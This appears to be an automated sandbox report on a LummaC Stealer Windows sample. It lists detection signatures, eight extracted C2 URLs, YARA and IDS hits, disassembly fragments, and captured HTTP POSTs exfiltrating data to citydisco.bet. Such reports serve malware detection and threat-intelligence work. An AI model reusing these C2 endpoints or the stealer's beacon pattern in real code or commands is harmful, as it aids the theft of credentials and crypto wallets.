Edit tour

Windows Analysis Report
SoftWare(1).exe1.exe

Overview

General Information

Sample name:	SoftWare(1).exe1.exe
Analysis ID:	1637270
MD5:	dca5a4d306b6166c5a4d4756707712e8
SHA1:	62fada94166304380dcec9a7a980a359ba3ba101
SHA256:	ba4bd6d7a2644c76ce30c905804302afdb1d0f5c6110bdedb7d4ea400f5c74bf
Tags:	exeuser-TornadoAV_dev
Infos:

Detection

LummaC Stealer

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Yara detected LummaC Stealer

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

SoftWare(1).exe1.exe (PID: 1664 cmdline: "C:\Users\user\Desktop\SoftWare(1).exe1.exe" MD5: DCA5A4D306B6166C5A4D4756707712E8)

SoftWare(1).exe1.exe (PID: 2340 cmdline: "C:\Users\user\Desktop\SoftWare(1).exe1.exe" MD5: DCA5A4D306B6166C5A4D4756707712E8)

cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": ["citydisco.bet/gdJIS", "crosshairc.life/dAnjhw", "mrodularmall.top/aNzS", "jowinjoinery.icu/bdWUa", "legenassedk.top/bdpWO", "htardwarehu.icu/Sbdsa", "cjlaspcorne.icu/DbIps", "bugildbett.top/bAuz"], "Build id": "72ccc69330ea96770a98fad11f3418f4c49712a7e9c8cbc0fec1947b"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000001.00000003.1554884834.0000000000BB9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: SoftWare(1).exe1.exe PID: 2340	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: SoftWare(1).exe1.exe PID: 2340	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-13T13:33:26.163727+0100	2028371	3	Unknown Traffic	192.168.2.5	49705	188.114.96.3	443	TCP
2025-03-13T13:33:29.489608+0100	2028371	3	Unknown Traffic	192.168.2.5	49706	188.114.96.3	443	TCP
2025-03-13T13:33:31.961306+0100	2028371	3	Unknown Traffic	192.168.2.5	49707	188.114.96.3	443	TCP
2025-03-13T13:33:34.593625+0100	2028371	3	Unknown Traffic	192.168.2.5	49708	188.114.96.3	443	TCP
2025-03-13T13:33:37.775399+0100	2028371	3	Unknown Traffic	192.168.2.5	49709	188.114.96.3	443	TCP
2025-03-13T13:33:39.945687+0100	2028371	3	Unknown Traffic	192.168.2.5	49710	188.114.96.3	443	TCP
2025-03-13T13:33:42.213724+0100	2028371	3	Unknown Traffic	192.168.2.5	49712	188.114.96.3	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: SoftWare(1).exe1.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://citydisco.bet:443/gdJIS	Avira URL Cloud: Label: malware
Source: crosshairc.life/dAnjhw	Avira URL Cloud: Label: malware
Source: https://citydisco.bet/gdJIS	Avira URL Cloud: Label: malware

Found malware configuration

Source: 1.2.SoftWare(1).exe1.exe.400000.1.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["citydisco.bet/gdJIS", "crosshairc.life/dAnjhw", "mrodularmall.top/aNzS", "jowinjoinery.icu/bdWUa", "legenassedk.top/bdpWO", "htardwarehu.icu/Sbdsa", "cjlaspcorne.icu/DbIps", "bugildbett.top/bAuz"], "Build id": "72ccc69330ea96770a98fad11f3418f4c49712a7e9c8cbc0fec1947b"}

Sample uses string decryption to hide its real strings

Source: 1.2.SoftWare(1).exe1.exe.400000.1.unpack	String decryptor: citydisco.bet/gdJIS
Source: 1.2.SoftWare(1).exe1.exe.400000.1.unpack	String decryptor: crosshairc.life/dAnjhw
Source: 1.2.SoftWare(1).exe1.exe.400000.1.unpack	String decryptor: mrodularmall.top/aNzS
Source: 1.2.SoftWare(1).exe1.exe.400000.1.unpack	String decryptor: jowinjoinery.icu/bdWUa
Source: 1.2.SoftWare(1).exe1.exe.400000.1.unpack	String decryptor: legenassedk.top/bdpWO
Source: 1.2.SoftWare(1).exe1.exe.400000.1.unpack	String decryptor: htardwarehu.icu/Sbdsa
Source: 1.2.SoftWare(1).exe1.exe.400000.1.unpack	String decryptor: cjlaspcorne.icu/DbIps
Source: 1.2.SoftWare(1).exe1.exe.400000.1.unpack	String decryptor: bugildbett.top/bAuz

Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0041C833 CryptUnprotectData,CryptUnprotectData,	1_2_0041C833
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0041BCC0 CryptUnprotectData,	1_2_0041BCC0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0041C833 CryptUnprotectData,CryptUnprotectData,	1_2_0041C833

Source: SoftWare(1).exe1.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49712 version: TLS 1.2

Source: SoftWare(1).exe1.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00348ECE FindFirstFileExW,	0_2_00348ECE
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00348F7F FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00348F7F
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00348ECE FindFirstFileExW,	1_2_00348ECE
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00348F7F FindFirstFileExW,FindNextFileW,FindClose,FindClose,	1_2_00348F7F

Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax+00000104h]	1_2_0041C833
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 6D58C181h	1_2_00421890
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-4926828Eh]	1_2_00421890
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax+04h]	1_2_00413143
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], CF91E6EAh	1_2_0044A106
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then lea ecx, dword ptr [eax+eax]	1_2_00412AF8
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then lea ecx, dword ptr [eax-40000000h]	1_2_00412AF8
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then lea edx, dword ptr [ecx+ecx]	1_2_00412AF8
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then cmp word ptr [edi+ebx], 0000h	1_2_0044C2A0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edi+3E8E80E8h]	1_2_0044D300
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then mov word ptr [ecx], bx	1_2_0044D300
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ecx+44h]	1_2_00444300
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], esi	1_2_0044C3A0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-26h]	1_2_0044C3A0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then mov ebp, ebx	1_2_0044C3A0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then movzx ecx, di	1_2_0042FE40
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-1272D010h]	1_2_0042FE40
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-26h]	1_2_0044D7F0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+18h]	1_2_0040EFAE
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then mov word ptr [edi], cx	1_2_00429840
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then movzx edx, byte ptr [00451018h]	1_2_0040F066
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	1_2_00402800
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 1ED597A4h	1_2_004480C0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then mov word ptr [eax], cx	1_2_00410897
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx]	1_2_00410897
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-26h]	1_2_0044D950
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-0D0EF488h]	1_2_0042D92B
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then mov dword ptr [esi], FFFFFFFFh	1_2_004019E0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then movzx edi, byte ptr [esp+edx-51AE6CD0h]	1_2_0044AA55
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then mov dword ptr [esp], 8B8A8924h	1_2_0043F250
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then movzx eax, byte ptr [esp+edx+19DCC0F6h]	1_2_00445250
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then movzx ebx, byte ptr [ebp+edi+00h]	1_2_00445250
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then mov byte ptr [ecx], dl	1_2_00423A70
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then mov byte ptr [edi], cl	1_2_00423A70
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], C446A772h	1_2_0041E21B
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-4926821Eh]	1_2_0041E21B
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-4926821Eh]	1_2_0041E21B
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 656D2358h	1_2_0041E21B
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then jmp eax	1_2_0041E21B
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+70h]	1_2_0041E21B
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-49268212h]	1_2_0041E21B
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then movzx esi, byte ptr [eax]	1_2_00448220
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h	1_2_004292C0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-6BB1A2B4h]	1_2_004482E0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-000000FAh]	1_2_00433A88
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then push eax	1_2_00449B7F
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax+00000104h]	1_2_0041C833
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	1_2_0040A320
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	1_2_0040A320
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-000000FAh]	1_2_00433A88
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+34h]	1_2_00433330
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then mov byte ptr [esi], cl	1_2_00436BE5
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then movzx eax, byte ptr [esp+edx+68h]	1_2_00437BB8
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then mov byte ptr [ecx], dl	1_2_00411C5F
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	1_2_00435C60
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then mov dword ptr [esp+08h], ebx	1_2_00445C70
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then mov word ptr [eax], cx	1_2_00410C1B
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx]	1_2_00410C1B
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then movzx eax, byte ptr [esp+esi+5Ch]	1_2_0042F430
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	1_2_00441480
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+49408C66h]	1_2_00428CB0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	1_2_0044BD46
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then mov byte ptr [eax], cl	1_2_0041EDDC
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+6D3F2F7Eh]	1_2_00420D90
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then movzx edx, byte ptr [eax]	1_2_00448590
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+50h]	1_2_004305B2
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	1_2_0041AE40
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then mov byte ptr [edi], cl	1_2_00438E42
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then mov dword ptr [esp+10h], ecx	1_2_00438E42
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then add eax, esi	1_2_00437627
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then movzx edx, byte ptr [ebp+ecx+00h]	1_2_0040CE30
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+esi]	1_2_0040CE30
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then mov dword ptr [esp+10h], ecx	1_2_00438E39
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+ecx+0Ah]	1_2_00445ED1
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax]	1_2_00445ED1
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+18h]	1_2_004236EB
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then mov byte ptr [ebx], cl	1_2_004386EC
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then mov word ptr [eax], cx	1_2_00432F60
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then movzx edi, byte ptr [esi+edx]	1_2_00432F60
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then mov word ptr [eax], cx	1_2_00432F60
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax]	1_2_0041AF00
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-4926828Ah]	1_2_0041AF00
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+1A92C912h]	1_2_0040C710
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-2Ah]	1_2_0044C7D0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax+04h]	1_2_00412FDB
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax]	1_2_00446790
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then mov byte ptr [eax], cl	1_2_0041EFAD
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	1_2_00433FB0

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: citydisco.bet/gdJIS
Source: Malware configuration extractor	URLs: crosshairc.life/dAnjhw
Source: Malware configuration extractor	URLs: mrodularmall.top/aNzS
Source: Malware configuration extractor	URLs: jowinjoinery.icu/bdWUa
Source: Malware configuration extractor	URLs: legenassedk.top/bdpWO
Source: Malware configuration extractor	URLs: htardwarehu.icu/Sbdsa
Source: Malware configuration extractor	URLs: cjlaspcorne.icu/DbIps
Source: Malware configuration extractor	URLs: bugildbett.top/bAuz

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49712 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49710 -> 188.114.96.3:443

Source: global traffic	HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 97Host: citydisco.bet
Source: global traffic	HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=J28v2iOMgLZ6sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 14912Host: citydisco.bet
Source: global traffic	HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=8Gs56iC9nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15041Host: citydisco.bet
Source: global traffic	HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=X23YBNNYIoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20535Host: citydisco.bet
Source: global traffic	HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=BVkqoVRd23dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2606Host: citydisco.bet
Source: global traffic	HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=JkM2XnzkV90aH3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1090Host: citydisco.bet
Source: global traffic	HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 135Host: citydisco.bet

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: citydisco.bet

Source: unknown

HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 97Host: citydisco.bet

Source: SoftWare(1).exe1.exe, 00000001.00000003.1523402093.00000000032CE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: SoftWare(1).exe1.exe, 00000001.00000003.1523402093.00000000032CE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: SoftWare(1).exe1.exe, 00000001.00000003.1523402093.00000000032CE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: SoftWare(1).exe1.exe, 00000001.00000003.1523402093.00000000032CE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: SoftWare(1).exe1.exe, 00000001.00000003.1523402093.00000000032CE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: SoftWare(1).exe1.exe, 00000001.00000003.1523402093.00000000032CE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: SoftWare(1).exe1.exe, 00000001.00000003.1523402093.00000000032CE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: SoftWare(1).exe1.exe, 00000001.00000003.1523402093.00000000032CE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: SoftWare(1).exe1.exe, 00000001.00000003.1523402093.00000000032CE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: SoftWare(1).exe1.exe, 00000001.00000003.1523402093.00000000032CE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: SoftWare(1).exe1.exe, 00000001.00000003.1523402093.00000000032CE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: SoftWare(1).exe1.exe, 00000001.00000003.1467321786.000000000330A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: SoftWare(1).exe1.exe, 00000001.00000003.1467321786.000000000330A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: SoftWare(1).exe1.exe, 00000001.00000003.1467321786.000000000330A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: SoftWare(1).exe1.exe, 00000001.00000003.1467321786.000000000330A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SoftWare(1).exe1.exe, 00000001.00000003.1623669679.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1580306859.0000000000C03000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1601482730.0000000000C05000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1602098251.0000000000C0F000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1624372039.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000002.1625502494.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1602360035.0000000000C13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/
Source: SoftWare(1).exe1.exe, 00000001.00000003.1601482730.0000000000C05000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1602098251.0000000000C0F000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1602360035.0000000000C13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/3
Source: SoftWare(1).exe1.exe, 00000001.00000003.1601482730.0000000000C05000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1602098251.0000000000C0F000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1602360035.0000000000C13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/:
